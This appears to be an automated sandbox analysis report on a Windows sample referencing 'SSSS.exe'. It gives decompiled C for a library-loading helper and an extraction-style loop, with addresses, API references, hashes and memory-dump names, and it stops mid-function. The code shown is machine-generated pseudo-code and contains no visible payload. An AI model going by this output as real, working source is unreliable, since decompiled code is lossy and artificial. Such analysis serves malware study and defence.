                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDF5C4, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E00EDF5C4(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xf25c48 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xeeabe0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xf529bb34
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











                                                                                                                0x00edf5c9
                                                                                                                0x00edf5cd
                                                                                                                0x00edf5d4
                                                                                                                0x00edf5d8
                                                                                                                0x00edf5e6
                                                                                                                0x00edf5f6
                                                                                                                0x00edf5fc
                                                                                                                0x00edf600
                                                                                                                0x00edf629
                                                                                                                0x00edf62b
                                                                                                                0x00edf62f
                                                                                                                0x00edf632
                                                                                                                0x00edf632
                                                                                                                0x00edf638
                                                                                                                0x00edf63a
                                                                                                                0x00000000
                                                                                                                0x00edf63b
                                                                                                                0x00edf602
                                                                                                                0x00edf60b
                                                                                                                0x00edf61a
                                                                                                                0x00edf60d
                                                                                                                0x00edf610
                                                                                                                0x00edf616
                                                                                                                0x00edf616
                                                                                                                0x00edf61e
                                                                                                                0x00000000
                                                                                                                0x00edf620
                                                                                                                0x00edf623
                                                                                                                0x00edf625
                                                                                                                0x00000000
                                                                                                                0x00edf625
                                                                                                                0x00edf61e
                                                                                                                0x00edf5da
                                                                                                                0x00edf5df
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00ED8877,00000000,00000000,?,00EDF56B,00ED8877,00000000,00000000,00000000,?,00EDF768,00000006,FlsSetValue), ref: 00EDF5F6
                                                                                                                • GetLastError.KERNEL32(?,00EDF56B,00ED8877,00000000,00000000,00000000,?,00EDF768,00000006,FlsSetValue,00EEB098,00EEB0A0,00000000,00000364,?,00EDE0E7), ref: 00EDF602
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00EDF56B,00ED8877,00000000,00000000,00000000,?,00EDF768,00000006,FlsSetValue,00EEB098,00EEB0A0,00000000), ref: 00EDF610
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3177248105-0
                                                                                                                • Opcode ID: 09b44b3a9f53840bbc7af2544aba40c82979d2854e4b3c95f1193c3e5699e858
                                                                                                                • Instruction ID: 14c727ecb4628c47da416da83a80b8d87e5c6ce9ee80ba0ebdfc4560276f3e20
                                                                                                                • Opcode Fuzzy Hash: 09b44b3a9f53840bbc7af2544aba40c82979d2854e4b3c95f1193c3e5699e858
                                                                                                                • Instruction Fuzzy Hash: 9F014C3260522A9FC721CE79AC44A967798EF01765B140631F857FB790CB20D80386D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC9199, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 328COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E00EC9199(void* __edx, signed int* __edi) {
				char _v16;
				char _v32;
				signed int _v36;
				signed int _v40;
				char _v41;
				char _v42;
				char _v53;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t34;
				intOrPtr _t35;
				signed int _t37;
				signed int _t38;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t46;
				signed int _t55;
				signed short _t56;
				signed int _t57;
				void* _t65;
				signed int _t69;
				signed char* _t71;
				signed int _t81;
				void* _t82;
				void* _t85;
				void* _t90;
				void* _t91;
				signed int _t96;
				signed short _t101;
				signed int _t102;
				signed int* _t103;
				signed int _t104;
				signed int _t106;
				signed int* _t112;
				void* _t118;
				signed int* _t119;
				signed char* _t120;
				signed int* _t121;
				signed int* _t122;
				intOrPtr* _t124;
				signed int* _t125;
				signed int _t127;
				void* _t129;
				signed int _t130;
				void* _t136;
				void* _t138;

				_t122 = __edi;
				_t118 = __edx;
				_t34 =  *0xf16de9;
				 *0xf0b590 =  *0xf0b590 | 0xffffffff;
				_t100 = 0;
				 *0xf0b5ac = 0;
				 *0xf0b5a8 = 0;
				 *0xf0b5b0 = 0;
				 *0xf0b68c = 1;
				_t96 = 0;
				_t135 = 0xf0b6a4;
				_t140 = _t34;
				if(_t34 != 0) {
					L5:
					_v41 = _t100;
					_push(_t122);
					__eflags = _t34;
					if(_t34 != 0) {
						L20:
						_t127 =  *0xefb564; // 0x0
						L21:
						_t35 =  *0xefb560; // 0x4b400
						 *0xefb578 =  *0xefb578 + 1;
						 *0xefb570 = _t35;
						 *0xefb574 = _t127;
						E00EC9C4D(_t118);
						_t101 =  *0xf0b5f4; // 0x8
						_t37 = _t101 & 0x0000ffff;
						__eflags = _t37;
						if(_t37 == 0) {
							_t102 = 0;
							_t136 = 0;
							_t127 = 0;
							__eflags = 0;
							_t122 = 0xefb58c;
							_v40 = 0;
							while(1) {
								_t119 = _t122;
								 *0xf0b6a0 = _t102;
								 *0xf0b69c = _t119;
								do {
									_t38 =  *0xf0b5a0; // 0x116
									_t39 = _t38 + 0xffffffff;
									__eflags = _t39;
									 *0xf0b5a0 = _t39;
									asm("adc dword [0xf0b5a4], 0xffffffff");
									if(__eflags < 0) {
										L34:
										_t40 = E00ECA1D6(_t39, _t119);
										_t102 =  *0xf0b6a0; // 0x0
										_t119 =  *0xf0b69c; // 0x0
										L35:
										__eflags = _t40 - 0xffffffff;
										if(_t40 == 0xffffffff) {
											L40:
											__eflags = _t102;
											if(_t102 != 0) {
												E00EC9E7D(_t122, _t102);
											}
											_t135 = 0xf0b6a4;
											L43:
											_v42 = 0;
											_t41 = E00EC772D();
											__eflags = _t41;
											if(_t41 != 0) {
												__eflags =  *0xf16de9;
												if( *0xf16de9 == 0) {
													_v42 = 1;
												}
											}
											__eflags = _t96 - 6;
											if(_t96 == 6) {
												E00EC18D9(0xf10b74);
											}
											__eflags =  *0xf0c835;
											if( *0xf0c835 == 0) {
												L63:
												_t42 =  *0xf0b590; // 0x42cdee65
												__eflags =  !_t42 -  *0xf0b5fc; // 0xbd32119a
												if(__eflags != 0) {
													goto L66;
												}
												goto L64;
											} else {
												E00ECD4A2( &_v32, 0xf0c840);
												__eflags =  *0xefb55c; // 0x0
												if(__eflags > 0) {
													L53:
													E00ECA44D();
													 *0xefb558 =  *0xefb558 + 0xa;
													asm("adc dword [0xefb55c], 0x0");
													E00EC9C4D(_t119);
													_t55 =  *0xefb588; // 0x31ef6f0
													 *(_t55 + 0x40) =  *(_t55 + 0x40) & 0xfffffffe;
													_t129 = 0;
													__eflags = 0;
													_t104 =  *0xf0b5a0; // 0x116
													_t120 =  *0xf0b598; // 0x31dc72d
													do {
														_t104 = _t104 + 0xffffffff;
														__eflags = _t104;
														 *0xf0b5a0 = _t104;
														asm("adc dword [0xf0b5a4], 0xffffffff");
														if(__eflags < 0) {
															L58:
															_t56 = E00ECA1D6(_t55, _t120);
															_t104 =  *0xf0b5a0; // 0x116
															_t120 =  *0xf0b598; // 0x31dc72d
															_t55 = _t56 & 0x0000ffff;
															goto L59;
														}
														if(__eflags > 0) {
															L57:
															_t55 =  *_t120 & 0x000000ff;
															_t120 =  &(_t120[1]);
															 *0xf0b598 = _t120;
															goto L59;
														}
														__eflags = _t104;
														if(_t104 < 0) {
															goto L58;
														}
														goto L57;
														L59:
														 *(_t138 + _t129 + 0x2c) = _t55;
														_t129 = _t129 + 1;
														__eflags = _t129 - 0xa;
													} while (_t129 < 0xa);
													_t57 =  *0xefb588; // 0x31ef6f0
													 *(_t57 + 0x40) =  *(_t57 + 0x40) | 0x00000001;
													_t43 = E00ED51D4( &_v16,  &_v32, 0xa);
													__eflags = _t43;
													if(_t43 != 0) {
														L66:
														__eflags = _t96 - 1;
														if(_t96 <= 1) {
															L68:
															_t44 =  *0xefb588; // 0x31ef6f0
															_push(_t135);
															_push(0xf19f02);
															__eflags =  *(_t44 + 0x40) & 0x00000001;
															if(__eflags == 0) {
																_push(3);
															} else {
																_push(4);
															}
															_t43 = E00EC173F(__eflags);
															L72:
															__eflags =  *0xf16d88;
															if( *0xf16d88 == 0) {
																__eflags =  *0xf16de9;
																if( *0xf16de9 == 0) {
																	_v42 = 1;
																}
															}
															_t96 = 2;
															L76:
															__eflags =  *0xf16de9;
															if( *0xf16de9 != 0) {
																L84:
																__eflags = _v42;
																if(_v42 != 0) {
																	E00EC24CD(_t135);
																}
																E00ECA44D();
																_t46 = _t96;
																L87:
																L88:
																return _t46;
															}
															L77:
															__eflags = _v41;
															if(_v41 == 0) {
																L82:
																__eflags =  *0xf16de9;
																if( *0xf16de9 == 0) {
																	E00EC9B78(_t96, _t122, _t127);
																}
																goto L84;
															}
															__eflags = _t96;
															if(_t96 != 0) {
																L81:
																_t103 =  *0xf0b690; // 0x0
																E00EC22BF(_t43, _t103);
																goto L82;
															}
															__eflags =  *0xefb574 - _t96; // 0x0
															if(__eflags > 0) {
																goto L81;
															}
															__eflags =  *0xefb570 - _t96; // 0x0
															if(__eflags <= 0) {
																goto L82;
															}
															goto L81;
														}
														__eflags = _t96 - 2;
														if(_t96 != 2) {
															goto L72;
														}
														goto L68;
													}
													__eflags =  *0xf0c835 - _t43; // 0x0
													if(__eflags == 0) {
														goto L63;
													}
													__eflags =  *0xf0c836 - _t43; // 0x0
													if(__eflags == 0) {
														L64:
														__eflags =  *0xf16de9;
														if( *0xf16de9 == 0) {
															goto L77;
														}
														goto L76;
													}
													goto L63;
												}
												if(__eflags < 0) {
													L52:
													 *0xefb558 = 0;
													 *0xefb55c = 0;
													goto L53;
												}
												__eflags =  *0xefb558; // 0x0
												if(__eflags >= 0) {
													goto L53;
												}
												goto L52;
											}
										}
										goto L36;
									}
									if(__eflags > 0) {
										L33:
										_t71 =  *0xf0b598; // 0x31dc72d
										_t130 =  *_t71 & 0x000000ff;
										 *0xf0b598 =  &(_t71[1]);
										_t40 = _t130;
										_v36 = _t130;
										_t127 = _v40;
										goto L35;
									}
									__eflags = _t39;
									if(_t39 < 0) {
										goto L34;
									}
									goto L33;
									L36:
									 *_t119 = _t40;
									_t121 =  *0xf0b69c; // 0x0
									_t106 =  *0xf0b6a0; // 0x0
									_t119 =  &(_t121[0]);
									_t102 = _t106 + 1;
									 *0xf0b69c = _t119;
									 *0xf0b6a0 = _t102;
									__eflags = _t102 - 0x10000;
								} while (_t102 != 0x10000);
								_t124 =  *0xf0b5b8; // 0x0
								_t136 = _t136 + 0x10000;
								asm("adc esi, ebx");
								_v40 = _t127;
								 *0xee7220();
								_t65 =  *((intOrPtr*)( *((intOrPtr*)( *_t124 + 0x14))))();
								_t127 = _v40;
								asm("adc edx, [0xf0b5d4]");
								E00EC76EE(_t136, _t127,  *0xefb560,  *0xefb564, _t65 +  *0xf0b5d0, _t119,  *0xf0b5c8,  *0xf0b5cc);
								L00EC7728();
								_t69 = E00EC772D();
								_t122 = 0xefb58c;
								__eflags = _t69;
								if(_t69 != 0) {
									_t102 =  *0xf0b6a0; // 0x0
									goto L40;
								}
								E00EC9E7D(0xefb58c,  *0xf0b6a0);
								_t102 = 0;
							}
						}
						__eflags = _t37 + 0xfffffff8 - 1;
						if(_t37 + 0xfffffff8 > 1) {
							E00EC1A1A(0xf10b74, 0xf19f02, _t135);
							E00ECA44D();
							__eflags =  *0xf16de9 - _t96;
							if( *0xf16de9 == _t96) {
								E00EC9B78(_t96, _t122, _t127);
								E00EC24CD(_t135);
							}
							_t46 = 1;
							goto L87;
						}
						__eflags = _t101 - 9;
						_t81 = E00ECAB6B(_t118, 0 | _t101 == 0x00000009);
						__eflags = _t81;
						if(_t81 != 0) {
							__eflags = _t81 - 3;
							_t96 = 2 + (0 | _t81 == 0x00000003) * 4;
						}
						goto L43;
					}
					_t127 =  *0xefb564; // 0x0
					__eflags = _t127 - _t100;
					if(__eflags < 0) {
						goto L21;
					}
					if(__eflags > 0) {
						L9:
						_t82 = E00ED3660( *0xefb560, _t127, 0x400, _t100);
						__eflags = _t118 -  *0xefb55c; // 0x0
						if(__eflags > 0) {
							goto L21;
						}
						if(__eflags < 0) {
							L12:
							__eflags = _t127;
							if(__eflags < 0) {
								L19:
								_t125 =  *0xf0b690; // 0x0
								 *0xee7220( *0xefb560, _t127, 0);
								_t85 =  *((intOrPtr*)( *((intOrPtr*)( *_t125 + 0x10))))();
								_t112 =  *0xf0b690; // 0x0
								E00EC22BF(_t85, _t112);
								_t122 =  *0xf0b690; // 0x0
								__eflags = 0;
								_v53 = 1;
								 *0xee7220(0, 0, 0);
								 *((intOrPtr*)( *((intOrPtr*)( *_t122 + 0x10))))();
								goto L20;
							}
							if(__eflags > 0) {
								L15:
								_t90 = E00EC1D95(_t118);
								__eflags = _t118 -  *0xefb55c; // 0x0
								if(__eflags < 0) {
									goto L20;
								}
								if(__eflags > 0) {
									L18:
									_t127 =  *0xefb564; // 0x0
									goto L19;
								}
								__eflags = _t90 -  *0xefb558; // 0x0
								if(__eflags <= 0) {
									goto L20;
								}
								goto L18;
							}
							__eflags =  *0xefb560 - 0x5f5e100;
							if( *0xefb560 <= 0x5f5e100) {
								goto L19;
							}
							goto L15;
						}
						__eflags = _t82 -  *0xefb558; // 0x0
						if(__eflags >= 0) {
							goto L21;
						}
						goto L12;
					}
					__eflags =  *0xefb560 - 0xf4240;
					if( *0xefb560 <= 0xf4240) {
						goto L21;
					}
					goto L9;
				}
				_t91 = E00ECA022(0, __edx, __edi, _t140); // executed
				_t141 = _t91;
				if(_t91 == 0) {
					L4:
					_t34 =  *0xf16de9;
					_t100 = 0;
					__eflags = 0;
					goto L5;
				}
				_push(1);
				_push(0xf0b6a4);
				E00EC23EF(0, 0xf0b6a4);
				if(E00ECA022(0, __edx, __edi, _t141) == 0) {
					goto L4;
				} else {
					E00EC1836(0xf10b74, 0xf19f02, 0xf0b6a4);
					_t46 = 0x34;
					goto L88;
				}
			}





















































                                                                                                                0x00ec9199
                                                                                                                0x00ec9199
                                                                                                                0x00ec9199
                                                                                                                0x00ec91a1
                                                                                                                0x00ec91a8
                                                                                                                0x00ec91aa
                                                                                                                0x00ec91b0
                                                                                                                0x00ec91b6
                                                                                                                0x00ec91bc
                                                                                                                0x00ec91c7
                                                                                                                0x00ec91ca
                                                                                                                0x00ec91cf
                                                                                                                0x00ec91d1
                                                                                                                0x00ec920c
                                                                                                                0x00ec920c
                                                                                                                0x00ec9211
                                                                                                                0x00ec9212
                                                                                                                0x00ec9214
                                                                                                                0x00ec92e7
                                                                                                                0x00ec92e7
                                                                                                                0x00ec92ed
                                                                                                                0x00ec92ed
                                                                                                                0x00ec92f2
                                                                                                                0x00ec92f8
                                                                                                                0x00ec92fd
                                                                                                                0x00ec9303
                                                                                                                0x00ec9308
                                                                                                                0x00ec930f
                                                                                                                0x00ec9312
                                                                                                                0x00ec9314
                                                                                                                0x00ec9379
                                                                                                                0x00ec937b
                                                                                                                0x00ec937d
                                                                                                                0x00ec937d
                                                                                                                0x00ec937f
                                                                                                                0x00ec9384
                                                                                                                0x00ec9388
                                                                                                                0x00ec9388
                                                                                                                0x00ec938a
                                                                                                                0x00ec9390
                                                                                                                0x00ec9396
                                                                                                                0x00ec9396
                                                                                                                0x00ec939b
                                                                                                                0x00ec939b
                                                                                                                0x00ec939e
                                                                                                                0x00ec93a3
                                                                                                                0x00ec93aa
                                                                                                                0x00ec93cc
                                                                                                                0x00ec93cc
                                                                                                                0x00ec93d1
                                                                                                                0x00ec93d7
                                                                                                                0x00ec93dd
                                                                                                                0x00ec93dd
                                                                                                                0x00ec93e0
                                                                                                                0x00ec9487
                                                                                                                0x00ec9487
                                                                                                                0x00ec9489
                                                                                                                0x00ec948d
                                                                                                                0x00ec948d
                                                                                                                0x00ec9492
                                                                                                                0x00ec9497
                                                                                                                0x00ec9497
                                                                                                                0x00ec949c
                                                                                                                0x00ec94a1
                                                                                                                0x00ec94a3
                                                                                                                0x00ec94a5
                                                                                                                0x00ec94ac
                                                                                                                0x00ec94ae
                                                                                                                0x00ec94ae
                                                                                                                0x00ec94ac
                                                                                                                0x00ec94b3
                                                                                                                0x00ec94b6
                                                                                                                0x00ec94bd
                                                                                                                0x00ec94bd
                                                                                                                0x00ec94c2
                                                                                                                0x00ec94c9
                                                                                                                0x00ec959e
                                                                                                                0x00ec959e
                                                                                                                0x00ec95a5
                                                                                                                0x00ec95ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec94cf
                                                                                                                0x00ec94d9
                                                                                                                0x00ec94e0
                                                                                                                0x00ec94e6
                                                                                                                0x00ec94fc
                                                                                                                0x00ec94fc
                                                                                                                0x00ec9501
                                                                                                                0x00ec9508
                                                                                                                0x00ec950f
                                                                                                                0x00ec9514
                                                                                                                0x00ec9519
                                                                                                                0x00ec951d
                                                                                                                0x00ec951d
                                                                                                                0x00ec951f
                                                                                                                0x00ec9525
                                                                                                                0x00ec952b
                                                                                                                0x00ec952b
                                                                                                                0x00ec952b
                                                                                                                0x00ec952e
                                                                                                                0x00ec9534
                                                                                                                0x00ec953b
                                                                                                                0x00ec954f
                                                                                                                0x00ec954f
                                                                                                                0x00ec9554
                                                                                                                0x00ec955a
                                                                                                                0x00ec9560
                                                                                                                0x00000000
                                                                                                                0x00ec9560
                                                                                                                0x00ec953d
                                                                                                                0x00ec9543
                                                                                                                0x00ec9543
                                                                                                                0x00ec9546
                                                                                                                0x00ec9547
                                                                                                                0x00000000
                                                                                                                0x00ec9547
                                                                                                                0x00ec953f
                                                                                                                0x00ec9541
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec9563
                                                                                                                0x00ec9563
                                                                                                                0x00ec9567
                                                                                                                0x00ec9568
                                                                                                                0x00ec9568
                                                                                                                0x00ec956d
                                                                                                                0x00ec9574
                                                                                                                0x00ec9582
                                                                                                                0x00ec958a
                                                                                                                0x00ec958c
                                                                                                                0x00ec95b8
                                                                                                                0x00ec95b8
                                                                                                                0x00ec95bb
                                                                                                                0x00ec95c2
                                                                                                                0x00ec95c2
                                                                                                                0x00ec95c7
                                                                                                                0x00ec95c8
                                                                                                                0x00ec95cd
                                                                                                                0x00ec95d1
                                                                                                                0x00ec95d7
                                                                                                                0x00ec95d3
                                                                                                                0x00ec95d3
                                                                                                                0x00ec95d3
                                                                                                                0x00ec95d9
                                                                                                                0x00ec95de
                                                                                                                0x00ec95de
                                                                                                                0x00ec95e5
                                                                                                                0x00ec95e7
                                                                                                                0x00ec95ee
                                                                                                                0x00ec95f0
                                                                                                                0x00ec95f0
                                                                                                                0x00ec95ee
                                                                                                                0x00ec95f7
                                                                                                                0x00ec95f8
                                                                                                                0x00ec95f8
                                                                                                                0x00ec95ff
                                                                                                                0x00ec9635
                                                                                                                0x00ec9635
                                                                                                                0x00ec963a
                                                                                                                0x00ec963d
                                                                                                                0x00ec963d
                                                                                                                0x00ec9642
                                                                                                                0x00ec9647
                                                                                                                0x00ec9649
                                                                                                                0x00ec964b
                                                                                                                0x00ec9650
                                                                                                                0x00ec9650
                                                                                                                0x00ec9601
                                                                                                                0x00ec9601
                                                                                                                0x00ec9606
                                                                                                                0x00ec9627
                                                                                                                0x00ec9627
                                                                                                                0x00ec962e
                                                                                                                0x00ec9630
                                                                                                                0x00ec9630
                                                                                                                0x00000000
                                                                                                                0x00ec962e
                                                                                                                0x00ec9608
                                                                                                                0x00ec960a
                                                                                                                0x00ec961c
                                                                                                                0x00ec961c
                                                                                                                0x00ec9622
                                                                                                                0x00000000
                                                                                                                0x00ec9622
                                                                                                                0x00ec960c
                                                                                                                0x00ec9612
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec9614
                                                                                                                0x00ec961a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec961a
                                                                                                                0x00ec95bd
                                                                                                                0x00ec95c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec95c0
                                                                                                                0x00ec958e
                                                                                                                0x00ec9594
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec9596
                                                                                                                0x00ec959c
                                                                                                                0x00ec95ad
                                                                                                                0x00ec95ad
                                                                                                                0x00ec95b4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec95b6
                                                                                                                0x00000000
                                                                                                                0x00ec959c
                                                                                                                0x00ec94e8
                                                                                                                0x00ec94f2
                                                                                                                0x00ec94f2
                                                                                                                0x00ec94f7
                                                                                                                0x00000000
                                                                                                                0x00ec94f7
                                                                                                                0x00ec94ea
                                                                                                                0x00ec94f0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec94f0
                                                                                                                0x00ec94c9
                                                                                                                0x00000000
                                                                                                                0x00ec93e0
                                                                                                                0x00ec93ac
                                                                                                                0x00ec93b2
                                                                                                                0x00ec93b2
                                                                                                                0x00ec93b7
                                                                                                                0x00ec93bb
                                                                                                                0x00ec93c0
                                                                                                                0x00ec93c2
                                                                                                                0x00ec93c6
                                                                                                                0x00000000
                                                                                                                0x00ec93c6
                                                                                                                0x00ec93ae
                                                                                                                0x00ec93b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec93e6
                                                                                                                0x00ec93e6
                                                                                                                0x00ec93ed
                                                                                                                0x00ec93f3
                                                                                                                0x00ec93f9
                                                                                                                0x00ec93fa
                                                                                                                0x00ec93fb
                                                                                                                0x00ec9401
                                                                                                                0x00ec9407
                                                                                                                0x00ec9407
                                                                                                                0x00ec940b
                                                                                                                0x00ec9411
                                                                                                                0x00ec9419
                                                                                                                0x00ec9423
                                                                                                                0x00ec942c
                                                                                                                0x00ec9434
                                                                                                                0x00ec943c
                                                                                                                0x00ec9440
                                                                                                                0x00ec9456
                                                                                                                0x00ec945b
                                                                                                                0x00ec9460
                                                                                                                0x00ec9465
                                                                                                                0x00ec946a
                                                                                                                0x00ec946c
                                                                                                                0x00ec9481
                                                                                                                0x00000000
                                                                                                                0x00ec9481
                                                                                                                0x00ec9475
                                                                                                                0x00ec947a
                                                                                                                0x00ec947a
                                                                                                                0x00ec9388
                                                                                                                0x00ec9319
                                                                                                                0x00ec931c
                                                                                                                0x00ec9354
                                                                                                                0x00ec9359
                                                                                                                0x00ec935e
                                                                                                                0x00ec9364
                                                                                                                0x00ec9366
                                                                                                                0x00ec936c
                                                                                                                0x00ec936c
                                                                                                                0x00ec9373
                                                                                                                0x00000000
                                                                                                                0x00ec9373
                                                                                                                0x00ec9320
                                                                                                                0x00ec9328
                                                                                                                0x00ec932d
                                                                                                                0x00ec932f
                                                                                                                0x00ec9337
                                                                                                                0x00ec933d
                                                                                                                0x00ec933d
                                                                                                                0x00000000
                                                                                                                0x00ec932f
                                                                                                                0x00ec921a
                                                                                                                0x00ec9220
                                                                                                                0x00ec9222
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec9228
                                                                                                                0x00ec923a
                                                                                                                0x00ec9247
                                                                                                                0x00ec924c
                                                                                                                0x00ec9252
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec9258
                                                                                                                0x00ec9266
                                                                                                                0x00ec9266
                                                                                                                0x00ec9268
                                                                                                                0x00ec929b
                                                                                                                0x00ec929b
                                                                                                                0x00ec92b1
                                                                                                                0x00ec92b9
                                                                                                                0x00ec92bb
                                                                                                                0x00ec92c1
                                                                                                                0x00ec92c6
                                                                                                                0x00ec92cc
                                                                                                                0x00ec92d3
                                                                                                                0x00ec92dd
                                                                                                                0x00ec92e5
                                                                                                                0x00000000
                                                                                                                0x00ec92e5
                                                                                                                0x00ec926a
                                                                                                                0x00ec9278
                                                                                                                0x00ec927e
                                                                                                                0x00ec9283
                                                                                                                0x00ec9289
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec928b
                                                                                                                0x00ec9295
                                                                                                                0x00ec9295
                                                                                                                0x00000000
                                                                                                                0x00ec9295
                                                                                                                0x00ec928d
                                                                                                                0x00ec9293
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec9293
                                                                                                                0x00ec926c
                                                                                                                0x00ec9276
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec9276
                                                                                                                0x00ec925a
                                                                                                                0x00ec9260
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec9260
                                                                                                                0x00ec922a
                                                                                                                0x00ec9234
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec9234
                                                                                                                0x00ec91d3
                                                                                                                0x00ec91d8
                                                                                                                0x00ec91da
                                                                                                                0x00ec9205
                                                                                                                0x00ec9205
                                                                                                                0x00ec920a
                                                                                                                0x00ec920a
                                                                                                                0x00000000
                                                                                                                0x00ec920a
                                                                                                                0x00ec91dc
                                                                                                                0x00ec91de
                                                                                                                0x00ec91df
                                                                                                                0x00ec91eb
                                                                                                                0x00000000
                                                                                                                0x00ec91ed
                                                                                                                0x00ec91f8
                                                                                                                0x00ec91ff
                                                                                                                0x00000000
                                                                                                                0x00ec91ff

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EC9247
                                                                                                                  • Part of subcall function 00ECA022: __EH_prolog.LIBCMT ref: 00ECA027
                                                                                                                  • Part of subcall function 00ECA022: new.LIBCMT ref: 00ECA080
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: SSSS.exe
                                                                                                                • API String ID: 3007126557-2379260107
                                                                                                                • Opcode ID: b8b3c58b673eff82994f080adfe819695ebe344dcc3f34306eb5ee484c2978fb
                                                                                                                • Instruction ID: b577cd4dacf658e5137486209161a75b5419b6dea4c84dc9cc500af2f833ba4d
                                                                                                                • Opcode Fuzzy Hash: b8b3c58b673eff82994f080adfe819695ebe344dcc3f34306eb5ee484c2978fb
                                                                                                                • Instruction Fuzzy Hash: EDC122706042499FCB18DB29EE89F3937A6BB85318F08225DE851B72A3D7768847DB11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECA022, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 49%
                                                                                                                			E00ECA022(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t15;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				void* _t26;
				void* _t36;
				signed int _t37;
				void* _t43;
				void* _t46;

				_t46 = __eflags;
				_t36 = __edi;
				_t26 = __ebx;
				E00ED3344();
				E00ED3370();
				_t27 = _t43 - 0x1058;
				E00EC1AD9(_t43 - 0x1058);
				_push(0);
				if(E00EC2875(_t43 - 0x1058, __edx, _t46, 0xf0b6a4, _t43 - 0x1058) == 0) {
					L5:
